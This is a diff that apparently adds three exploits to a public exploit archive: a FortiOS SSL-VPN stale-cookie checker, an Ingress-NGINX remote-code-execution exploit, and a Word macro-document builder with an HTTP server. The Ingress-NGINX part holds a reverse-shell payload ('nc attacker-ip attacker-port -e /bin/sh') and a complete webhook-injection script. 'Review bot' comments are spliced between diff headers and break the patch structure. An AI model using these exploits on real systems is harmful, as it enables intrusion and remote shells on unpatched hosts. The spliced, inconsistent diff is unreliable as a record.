diff --git a/exploits/multiple/remote/52336.py b/exploits/multiple/remote/52336.py
new file mode 100755
index 000000000..5f76f92c1
--- /dev/null
+++ b/exploits/multiple/remote/52336.py
@@ -0,0 +1,312 @@
+#!/usr/bin/env python3
+"""
+# Exploit Title: FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse
+# Date: 2025-06-15
+# Exploit Author: Shahid Parvez Hakim (BugB Technologies)
+# Vendor Homepage: https://www.fortinet.com
+# Software Link: https://www.fortinet.com/products/secure-sd-wan/fortigate
+# Version: FortiOS 7.6.0, 7.4.0-7.4.7, 7.2.0-7.2.10, 7.0.x (all), 6.4.x (all)
+# Tested on: FortiOS 7.4.x, 7.2.x
+# CVE: CVE-2024-50562
+# CVSS: 4.4 (Medium)
+# Category: Session Management
+# CWE: CWE-613 (Insufficient Session Expiration)
+
+Description:
+An insufficient session expiration vulnerability in FortiOS SSL-VPN allows an attacker
+to reuse stale session cookies after logout, potentially leading to unauthorized access.
+The SVPNTMPCOOKIE remains valid even after the primary SVPNCOOKIE is invalidated during logout.
+
+References:
+- https://fortiguard.com/psirt/FG-IR-24-339
+- https://nvd.nist.gov/vuln/detail/CVE-2024-50562
+
+Usage:
+python3 fortinet_cve_2024_50562.py -t -u -p [options]
+
+Example:
+python3 fortinet_cve_2024_50562.py -t 192.168.1.10:443 -u testuser -p testpass
+python3 fortinet_cve_2024_50562.py -t 10.0.0.1:4433 -u admin -p password123 --realm users
+"""
+
+import argparse
+import requests
+import urllib3
+import re
+import sys
+from urllib.parse import urlparse
+
+# Disable SSL warnings for testing
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+class FortinetExploit:
+ def __init__(self, target, username, password, realm="", timeout=10, force=False):
+ self.target = target
+ self.username = username
+ self.password = password
+ self.realm = realm
+ self.timeout = timeout
+ self.force = force
+ self.base_url = f"https://{target}"
+ self.session = None
+
+ def banner(self):
+ """Display exploit banner"""
+ print("=" * 70)
+ print("CVE-2024-50562 - Fortinet SSL-VPN Session Management Bypass")
+ print("Author: Shahid Parvez Hakim (BugB Technologies)")
+ print("CVSS: 4.4 (Medium) | FG-IR-24-339")
+ print("=" * 70)
+ print(f"Target: {self.target}")
+ print(f"User: {self.username}")
+ print("-" * 70)
+
+ def validate_target(self):
+ """Check if target is reachable and is Fortinet SSL-VPN"""
+ try:
+ print("[*] Validating target...")
+ response = requests.get(f"{self.base_url}/remote/login",
+ verify=False, timeout=self.timeout)
+
+ # More flexible detection for Fortinet SSL-VPN
+ fortinet_indicators = [
+ "fortinet", "fortigate", "forticlient",
+ "sslvpn", "/remote/login", "SVPNCOOKIE",
+ "logincheck", "hostcheck_install",
+ "fgt_lang", "realm"
+ ]
+
+ response_text = response.text.lower()
+ detected_indicators = [indicator for indicator in fortinet_indicators
+ if indicator in response_text]
+
+ if detected_indicators:
+ print(f"[+] Target confirmed as Fortinet SSL-VPN (indicators: {', '.join(detected_indicators[:3])})")
+ return True
+ elif response.status_code == 200:
+ print("[!] Target reachable but Fortinet detection uncertain - proceeding anyway")
+ return True
+ else:
+ print("[-] Target does not appear to be Fortinet SSL-VPN")
+ return False
+
+ except requests.exceptions.RequestException as e:
+ print(f"[-] Connection failed: {e}")
+ return False
+
+ def attempt_login(self):
+ """Attempt to authenticate with provided credentials"""
+ try:
+ print("[*] Attempting authentication...")
+
+ self.session = requests.Session()
+ self.session.verify = False
+
+ # Get login page first
+ self.session.get(f"{self.base_url}/remote/login?lang=en", timeout=self.timeout)
+
+ # Attempt login
+ login_data = {
+ "ajax": "1",
+ "username": self.username,
+ "realm": self.realm,
+ "credential": self.password
+ }
+
+ headers = {"Content-Type": "application/x-www-form-urlencoded"}
+
+ response = self.session.post(f"{self.base_url}/remote/logincheck",
+ data=login_data, headers=headers,
+ timeout=self.timeout)
+
+ # Check if login was successful
+ if re.search(r"\bret=1\b", response.text) and "/remote/hostcheck_install" in response.text:
+ print("[+] Authentication successful!")
+
+ # Extract and display cookies
+ cookies = requests.utils.dict_from_cookiejar(response.cookies)
+ self.display_cookies(cookies, "Login")
+
+ return True, cookies
+ else:
+ print("[-] Authentication failed!")
+ print(f"[!] Server response: {response.text[:100]}...")
+ return False, {}
+
+ except requests.exceptions.RequestException as e:
+ print(f"[-] Login request failed: {e}")
+ return False, {}
+
+ def perform_logout(self):
+ """Perform logout and check cookie invalidation"""
+ try:
+ print("[*] Performing logout...")
+
+ response = self.session.get(f"{self.base_url}/remote/logout", timeout=self.timeout)
+ cookies_after_logout = requests.utils.dict_from_cookiejar(response.cookies)
+
+ print("[+] Logout completed")
+ self.display_cookies(cookies_after_logout, "Logout")
+
+ return cookies_after_logout
+
+ except requests.exceptions.RequestException as e:
+ print(f"[-] Logout request failed: {e}")
+ return {}
+
+ def test_session_reuse(self, original_cookies):
+ """Test if old session cookies still work after logout"""
+ try:
+ print("[*] Testing session cookie reuse...")
+
+ # Create new session to simulate attacker
+ exploit_session = requests.Session()
+ exploit_session.verify = False
+
+ # Use original login cookies
+ exploit_session.cookies.update(original_cookies)
+
+ # Try to access protected resource
+ test_url = f"{self.base_url}/sslvpn/portal.html"
+ response = exploit_session.get(test_url, timeout=self.timeout)
+
+ # Check if we're still authenticated
+ if self.is_authenticated_response(response.text):
+ print("[!] VULNERABILITY CONFIRMED!")
+ print("[!] Session cookies remain valid after logout")
+ print("[!] CVE-2024-50562 affects this system")
+ return True
+ else:
+ print("[+] Session properly invalidated")
+ print("[+] System appears to be patched")
+ return False
+
+ except requests.exceptions.RequestException as e:
+ print(f"[-] Session reuse test failed: {e}")
+ return False
+
+ def is_authenticated_response(self, response_body):
+ """Check if response indicates authenticated access"""
+ # If response contains login form elements, user is not authenticated
+ if re.search(r"/remote/login|name=[\"']username[\"']", response_body, re.I):
+ return False
+ return True
+
+ def display_cookies(self, cookies, context):
+ """Display cookies in a formatted way"""
+ if cookies:
+ print(f"[*] Cookies after {context}:")
+ for name, value in cookies.items():
+ # Truncate long values for display
+ display_value = value[:20] + "..." if len(value) > 20 else value
+ print(f" {name} = {display_value}")
+
+ # Highlight important cookies for CVE
+ if name == "SVPNTMPCOOKIE":
+ print(f" [!] Found SVPNTMPCOOKIE - Target for CVE-2024-50562")
+ elif name == "SVPNCOOKIE":
+ print(f" [*] Found SVPNCOOKIE - Primary session cookie")
+ else:
+ print(f"[*] No cookies set after {context}")
+
+ def exploit(self):
+ """Main exploit routine"""
+ self.banner()
+
+ # Step 1: Validate target (unless forced to skip)
+ if not self.force:
+ if not self.validate_target():
+ print("[!] Use --force to skip target validation and proceed anyway")
+ return False
+ else:
+ print("[*] Skipping target validation (--force enabled)")
+
+ # Step 2: Attempt login
+ login_success, login_cookies = self.attempt_login()
+ if not login_success:
+ return False
+
+ # Step 3: Perform logout
+ logout_cookies = self.perform_logout()
+
+ # Step 4: Test session reuse
+ vulnerable = self.test_session_reuse(login_cookies)
+
+ # Step 5: Display results
+ print("\n" + "=" * 70)
+ print("EXPLOIT RESULTS")
+ print("=" * 70)
+
+ if vulnerable:
+ print("STATUS: VULNERABLE")
+ print("CVE-2024-50562: CONFIRMED")
+ print("SEVERITY: Medium (CVSS 4.4)")
+ print("\nRECOMMENDATIONS:")
+ print("- Upgrade to patched FortiOS version")
+ print("- FortiOS 7.6.x: Upgrade to 7.6.1+")
+ print("- FortiOS 7.4.x: Upgrade to 7.4.8+")
+ print("- FortiOS 7.2.x: Upgrade to 7.2.11+")
+ print("- FortiOS 7.0.x/6.4.x: Migrate to supported version")
+ else:
+ print("STATUS: NOT VULNERABLE")
+ print("CVE-2024-50562: NOT AFFECTED")
+ print("\nSystem appears to be patched or not vulnerable")
+
+ return vulnerable
+
+def parse_target(target_string):
+ """Parse target string and extract host:port"""
+ if ':' not in target_string:
+ # Default HTTPS port if not specified
+ return f"{target_string}:443"
+ return target_string
+
+def main():
+ parser = argparse.ArgumentParser(
+ description="CVE-2024-50562 - Fortinet SSL-VPN Session Management Bypass Exploit",
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog="""
+Examples:
+ python3 %(prog)s -t 192.168.1.10:443 -u admin -p password
+ python3 %(prog)s -t 10.0.0.1:4433 -u testuser -p test123 --realm employees
+ python3 %(prog)s -t vpn.company.com -u user@domain.com -p pass --timeout 15
+ python3 %(prog)s -t 192.168.1.10:443 -u admin -p password --force
+ """
+ )
+
+ parser.add_argument('-t', '--target', required=True,
+ help='Target IP:PORT (e.g., 192.168.1.10:443)')
+ parser.add_argument('-u', '--username', required=True,
+ help='Username for authentication')
+ parser.add_argument('-p', '--password', required=True,
+ help='Password for authentication')
+ parser.add_argument('--realm', default='',
+ help='Authentication realm (optional)')
+ parser.add_argument('--timeout', type=int, default=10,
+ help='Request timeout in seconds (default: 10)')
+ parser.add_argument('--force', action='store_true',
+ help='Skip target validation and proceed anyway')
+
+ args = parser.parse_args()
+
+ # Parse and validate target
+ target = parse_target(args.target)
+
+ try:
+ # Initialize and run exploit
+ exploit = FortinetExploit(target, args.username, args.password,
+ args.realm, args.timeout, args.force)
+ vulnerable = exploit.exploit()
+
+ # Exit with appropriate code
+ sys.exit(0 if vulnerable else 1)
+
+ except KeyboardInterrupt:
+ print("\n[!] Exploit interrupted by user")
+ sys.exit(1)
+ except Exception as e:
+ print(f"[!] Unexpected error: {e}")
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/remote/52338.txt b/exploits/multiple/remote/52338.txt
new file mode 100644
index 000000000..78f8f4f1b
--- /dev/null
+++ b/exploits/multiple/remote/52338.txt
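Review bot: `is_authenticated_response` treats every body that lacks a login-form marker as authenticated, so an error page, an empty body or an unrelated response after logout makes `test_session_reuse` print "VULNERABILITY CONFIRMED" on an appliance that invalidated the session correctly. The check should require positive evidence, at least by passing the response object and rejecting non-200 results first, e.g. `if response.status_code != 200: return False`, before the regex test. `validate_target` has the same permissive shape: any HTTP 200 is accepted, and the generic string `"realm"` counts as a Fortinet indicator. Separately, the account password is taken from `-p` on the command line and sent over sessions with `verify = False`, so it shows up in process listings and is unprotected against an on-path interceptor; making `-p` optional and falling back to `getpass.getpass()` would remove the first exposure.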
@@ -0,0 +1,173 @@
+# Exploit Title: Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 2025-06-19
+# Exploit Author: Likhith Appalaneni
+# Vendor Homepage: https://kubernetes.github.io/ingress-nginx/
+# Software Link: https://github.com/kubernetes/ingress-nginx
+# Version: ingress-nginx v4.11.0 on Kubernetes v1.29.0 (Minikube)
+# Tested on: Ubuntu 24.04, Minikube vLatest, Docker vLatest
+# CVE : CVE-2025-1974
+
+1) Update the attacker ip and listening port in shell.c and Compile the shell payload:
+gcc -fPIC -shared -o shell.so shell.c
+
+2) Run the exploit:
+python3 exploit.py
+
+The exploit sends a crafted AdmissionRequest to the vulnerable Ingress-NGINX webhook and loads the shell.so to achieve code execution.
+
+<---> shell.c <--->
+
+#include
+__attribute__((constructor)) void init() {
+ system("sh -c 'nc attacker-ip attacker-port -e /bin/sh'");
+}
+
+<---> shell.c <--->
+<---> exploit.py <--->
+
+import json
+import requests
+import threading
+import time
+import urllib3
+import socket
+import argparse
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def upload_shell_via_socket(file_path, target_host, target_port):
+ print("[*] Uploading shell.so via raw socket to keep FD open...")
+ try:
+ with open(file_path, "rb") as f:
+ data = f.read()
+ data += b"\x00" * (16384 - len(data) % 16384)
+ content_len = len(data) + 2024
+
+ payload = f"POST /fake/addr HTTP/1.1\r\nHost: {target_host}:{target_port}\r\nContent-Type: application/octet-stream\r\nContent-Length: {content_len}\r\n\r\n".encode("ascii") + data
+
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect((target_host, target_port))
+ sock.sendall(payload)
+ print("[*] Payload sent, holding connection open for 220s...")
+ time.sleep(220)
+ sock.close()
+ except Exception as e:
+ print(f"[!] Upload failed: {e}")
+
+def build_payload(pid, fd):
+ annotation = "http://x/#;" + ("}" * 3) + f"\nssl_engine /proc/{pid}/fd/{fd};\n#"
+ return {
+ "kind": "AdmissionReview",
+ "apiVersion": "admission.k8s.io/v1",
+ "request": {
+ "uid": "exploit-uid",
+ "kind": {
+ "group": "networking.k8s.io",
+ "version": "v1",
+ "kind": "Ingress"
+ },
+ "resource": {
+ "group": "networking.k8s.io",
+ "version": "v1",
+ "resource": "ingresses"
+ },
+ "requestKind": {
+ "group": "networking.k8s.io",
+ "version": "v1",
+ "kind": "Ingress"
+ },
+ "requestResource": {
+ "group": "networking.k8s.io",
+ "version": "v1",
+ "resource": "ingresses"
+ },
+ "name": "example-ingress",
+ "operation": "CREATE",
+ "userInfo": {
+ "username": "kube-review",
+ "uid": "d9c6bf40-e0e6-4cd9-a9f4-b6966020ed3d"
+ },
+ "object": {
+ "kind": "Ingress",
+ "apiVersion": "networking.k8s.io/v1",
+ "metadata": {
+ "name": "example-ingress",
+ "annotations": {
+ "nginx.ingress.kubernetes.io/auth-url": annotation
+ }
+ },
+ "spec": {
+ "ingressClassName": "nginx",
+ "rules": [
+ {
+ "host": "hello-world.com",
+ "http": {
+ "paths": [
+ {
+ "path": "/",
+ "pathType": "Prefix",
+ "backend": {
+ "service": {
+ "name": "web",
+ "port": { "number": 8080 }
+ }
+ }
+ }
+ ]
+ }
+ }
+ ]
+ }
+ },
+ "oldObject": None,
+ "dryRun": False,
+ "options": {
+ "kind": "CreateOptions",
+ "apiVersion": "meta.k8s.io/v1"
+ }
+ }
+ }
+
+def send_requests(admission_url, pid_range, fd_range):
+ for pid in range(pid_range[0], pid_range[1]):
+ for fd in range(fd_range[0], fd_range[1]):
+ print(f"Trying /proc/{pid}/fd/{fd}")
+ payload = build_payload(pid, fd)
+ try:
+ resp = requests.post(
+ f"{admission_url}/networking/v1/ingresses",
+ headers={"Content-Type": "application/json"},
+ data=json.dumps(payload),
+ verify=False,
+ timeout=5
+ )
+ result = resp.json()
+ msg = result.get("response", {}).get("status", {}).get("message", "")
+ if "No such file" in msg or "Permission denied" in msg:
+ continue
+ print(f"[+] Interesting response at /proc/{pid}/fd/{fd}:\n{msg}")
+ except Exception as e:
+ print(f"[-] Error: {e}")
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description="Exploit CVE-2025-1974")
+ parser.add_argument("--upload-url", required=True, help="Upload URL (e.g., http://127.0.0.1:8080)")
+ parser.add_argument("--admission-url", required=True, help="Admission controller URL (e.g., https://127.0.0.1:8443)")
+ parser.add_argument("--shell", default="shell.so", help="Path to shell.so file")
+ parser.add_argument("--pid-start", type=int, default=26)
+ parser.add_argument("--pid-end", type=int, default=30)
+ parser.add_argument("--fd-start", type=int, default=1)
+ parser.add_argument("--fd-end", type=int, default=100)
+ args = parser.parse_args()
+
+ host = args.upload_url.split("://")[-1].split(":")[0]
+ port = int(args.upload_url.split(":")[-1])
+
+ upload_thread = threading.Thread(target=upload_shell_via_socket, args=(args.shell, host, port))
+ upload_thread.start()
+ time.sleep(3)
+ send_requests(args.admission_url, (args.pid_start, args.pid_end), (args.fd_start, args.fd_end))
+ upload_thread.join()
+
+<---> exploit.py <--->
\ No newline at end of file
diff --git a/exploits/windows/local/52337.py b/exploits/windows/local/52337.py
new file mode 100755
index 000000000..7c9e1608e
--- /dev/null
+++ b/exploits/windows/local/52337.py
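Review bot: The header documents how to run the proof of concept but not what it depends on or how the exposure is closed, which is what a defender reading this entry needs. As written, `send_requests` posts an `AdmissionReview` with no credentials straight to the controller's admission endpoint (`--admission-url`), so the precondition is network reach to that webhook from somewhere other than the API server; a line such as `# Precondition: admission webhook reachable from the caller's network position` under `# CVE`, plus a pointer to the vendor's fixed release, would make that explicit. For detection, the request is distinctive: the `nginx.ingress.kubernetes.io/auth-url` annotation carries newlines, closing braces and an `ssl_engine` directive, none of which belong in a URL, so admission or audit logging that flags such values covers this path. The `# Version:` line gives `v4.11.0`, which looks like a chart version rather than a controller version and is worth confirming against the advisory.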
@@ -0,0 +1,151 @@
+# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
+# Author: nu11secur1ty
+# Date: 06/16/2025
+# Vendor: Microsoft
+# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
+# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
+# CVE-2025-47957
+# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise
+
+## Description:
+The attacker can trick any user into opening and executing their code by
+sending a malicious DOCX file via email or a streaming server. After the
+execution of the victim, his machine can be infected or even worse than
+ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
+MACROS OPTIONS FROM YOUR OFFICE 365!!!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+
+[+]Exploit:
+
+```
+#!/usr/bin/python
+# CVE-2025-47957 by nu11secur1ty
+import os
+import time
+import zipfile
+import threading
+import http.server
+import socket
+import socketserver
+import win32com.client
+
+def get_local_ip():
+ """Get the LAN IP address of the current machine."""
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+ s.connect(("8.8.8.8", 80)) # External DNS, just for routing
+ ip = s.getsockname()[0]
+ s.close()
+ return ip
+ except:
+ return "127.0.0.1"
+
+def create_docm_with_auto_macro(filename):
+ script_dir = os.path.dirname(os.path.abspath(__file__))
+ full_path = os.path.join(script_dir, filename)
+
+ word = win32com.client.Dispatch("Word.Application")
+ word.Visible = False
+ doc = word.Documents.Add()
+
+ doc.Content.Text = "This document contains an auto-starting macro."
+
+ vbproject = doc.VBProject
+ vbcomponent = vbproject.VBComponents.Add(1) # Standard Module
+
+ macro_code = '''
+Sub AutoOpen()
+ Call YOUR_PoC
+End Sub
+
+Sub YOUR_PoC()
+ Dim Program As String
+ Dim TaskID As Double
+ On Error Resume Next
+ Program = "YOUR_EXPLOIT_HERE"
+ TaskID = YOUR_TASK_HERE
+ If Err <> 0 Then
+ MsgBox "Can't start " & Program
+ End If
+End Sub
+'''
+ vbcomponent.CodeModule.AddFromString(macro_code)
+
+ wdFormatXMLDocumentMacroEnabled = 13
+ doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
+ doc.Close()
+ word.Quit()
+
+ print(f"[+] Macro-enabled .docm saved at: {full_path}")
+ return full_path
+
+def compress_to_zip(filepath):
+ zip_path = filepath + '.zip'
+ with zipfile.ZipFile(zip_path, 'w') as zipf:
+ zipf.write(filepath, arcname=os.path.basename(filepath))
+ print(f"[+] Compressed to ZIP: {zip_path}")
+ return zip_path
+
+def start_http_server(directory, port=8000):
+ os.chdir(directory)
+ handler = http.server.SimpleHTTPRequestHandler
+ httpd = socketserver.TCPServer(("", port), handler)
+ ip = get_local_ip()
+ print(f"[+] HTTP server running at: http://{ip}:{port}/")
+
+ thread = threading.Thread(target=httpd.serve_forever)
+ thread.daemon = True
+ thread.start()
+ return httpd
+
+if __name__ == "__main__":
+ filename = "CVE-2025-47957.docm"
+ docm_path = create_docm_with_auto_macro(filename)
+ zip_path = compress_to_zip(docm_path)
+ server = start_http_server(os.path.dirname(docm_path))
+
+ try:
+ print("[*] Server running — press Ctrl+C to stop...")
+ while True:
+ time.sleep(1)
+ except KeyboardInterrupt:
+ print("\n[!] Ctrl+C detected — shutting down server...")
+ server.shutdown()
+ print("[+] The Exploit Server stopped. Goodbye!")
+
+```
+
+# Reproduce:
+[href](https://www.youtube.com/watch?v=r4NsGrO56yo)
+
+# Buy an exploit only:
+[href](https://satoshidisk.com/pay/COeJqt)
+
+# Time spent:
+01:37:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0d466b2e0..da9e4be73 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
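Review bot: The metadata of this entry contradicts its content, which makes it hard to triage: the title names Excel, the description speaks of a DOCX file, and `create_docm_with_auto_macro` builds a Word `.docm` through `Word.Application`, while the `# Reference:` URL points at CVE-2025-27751 and the next line and the output filename give CVE-2025-47957. The script itself only writes a document with an `AutoOpen` macro whose body is placeholders (`YOUR_EXPLOIT_HERE`, `YOUR_TASK_HERE`), so nothing visible in this hunk exercises a specific Office flaw; as far as the hunk shows, the relevant control is macro policy (blocking macros in files that arrive from the internet) rather than a patch level, and the header should say which of the two it is. The file is also stored as `.py` although prose, a Markdown fence and a mail signature surround the code, so it will not parse as Python; `.txt` or `.md` would match the content.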
@@ -10943,6 +10943,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
+52336,exploits/multiple/remote/52336.py,"FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse",2025-06-20,"Shahid Hakim",remote,multiple,,2025-06-20,2025-06-20,0,CVE-2024-50562,,,,,
 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
 52323,exploits/multiple/remote/52323.txt,"Freefloat FTP Server 1.0 - Remote Buffer Overflow",2025-06-13,"Fernando Mengali",remote,multiple,,2025-06-13,2025-06-13,0,CVE-2025-5548,,,,,
 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
@@ -11089,6 +11090,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
 30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
 21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
+52338,exploits/multiple/remote/52338.txt,"Ingress-NGINX 4.11.0 - Remote Code Execution (RCE)",2025-06-20,"Likhith Appalaneni",remote,multiple,,2025-06-20,2025-06-20,1,CVE-2025-1974,,,,,
 20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
 20467,exploits/multiple/remote/20467.txt,"Inktomi Search Software 3.0 - Source Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88576,,,,,https://www.securityfocus.com/bid/2061/info
 43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
@@ -41056,6 +41058,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,local,windows,,2006-06-26,,1,,,,,,
 18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,local,windows,,2011-11-07,2011-11-07,1,CVE-2011-0105;OSVDB-71765;MS11-021,"Metasploit Framework (MSF)",,,,http://www.zerodayinitiative.com/advisories/ZDI-11-121/
 18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
+52337,exploits/windows/local/52337.py,"Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)",2025-06-20,nu11secur1ty,local,windows,,2025-06-20,2025-06-20,0,CVE-2025-47957,,,,,
 40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
 52332,exploits/windows/local/52332.txt,"Microsoft Excel Use After Free - Local Code Execution",2025-06-15,nu11secur1ty,local,windows,,2025-06-15,2025-06-15,0,CVE-2025-27751,,,,,
 50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,